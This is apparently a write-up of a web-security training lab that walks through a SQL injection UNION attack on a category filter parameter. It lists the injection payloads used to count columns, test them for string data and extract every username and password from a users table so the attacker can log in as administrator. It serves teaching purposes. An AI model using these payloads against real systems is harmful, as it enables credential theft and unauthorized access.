Difficulty : Practitioner
π― Goal
The database contains a new table called users with columns username and password inside.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
β Solution
First we need to know how many columns are returned by the query:
1
2
3
<website>/filter?category=Pets' UNION SELECT NULL-- # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL-- # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL-- # error!
We now know there are 2 columns. Time to test if both contain string data:
1
2
<website>/filter?category=Pets' UNION SELECT 'abc',NULL-- # works
<website>/filter?category=Pets' UNION SELECT 'abc','abc'-- # works
We are now sure both columns contain string. We can try to extract the data in users table:
1
<website>/filter?category=Pets' UNION SELECT username, password FROM users--
The usernames and passwords are displayed.